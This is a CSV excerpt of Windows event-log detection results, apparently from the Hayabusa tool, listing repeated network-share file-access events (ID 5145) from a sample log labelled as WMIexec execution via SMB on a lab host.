2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.482 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi\dae9598a3b2d70231e340696e284163f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec#\e6ff20c47a7e849012d7ce8bdd777896 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb#\e58c4e8c63c0494a59885d5502339144 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a#\9f5bb7b6ff9da9d2a0649311aef761e8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69#\a9e1bbb2f77ddf73fdc37769da51597e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17#\acca0c1913cd50d9cfb935bc3fdcb23d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53#\84fa86c4d86aa17ce68c75a1625383e0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b#\11e47175268433f2afe5bf68ea4899ae | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b#\44884740e6e261405b0440efde616082 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d#\465ef4c9fe7c77ed5384c3c379fbe9b3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build\a7bcc49edef862e86e95e8959d30ae67 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22#\7a53b2a7d76ecfa30210cf5ead782971 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8#\02acbf854b27f2d83aa9eec6e1f6135a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#\69e2093b3cec29bdd3c9fbba83990dfe | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0#\dd2dddd8e337402ac96330a8d24120d6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\3df09428e1087ca282100efc481a9947 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83#\93e744bcb19dc3206bfff080448a94e1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#\8b051a98022e8b354053e87e1dcaf2f0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420#\88eec28a11e76fffbecf3de79cadf076 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2#\d75626a8ff89596aee2cf2c9eb554cbf | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90#\62095b976d2affb993898b2e9f88c475 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#\f39c57237f98d69b4abdc9e3907d8fe7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479#\9fd6e8c8110ccd01fd6745507b906c04 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b#\ec2e3c1e16b1d1427b32d2f2babf99bc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084#\a9175ff6a1a8784975c70e9933314ecd | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5#\c7ef2b5b5fc4335bef3148904cb3f0e5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\a5c640ad1645775e93d560f67f3ea1d1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
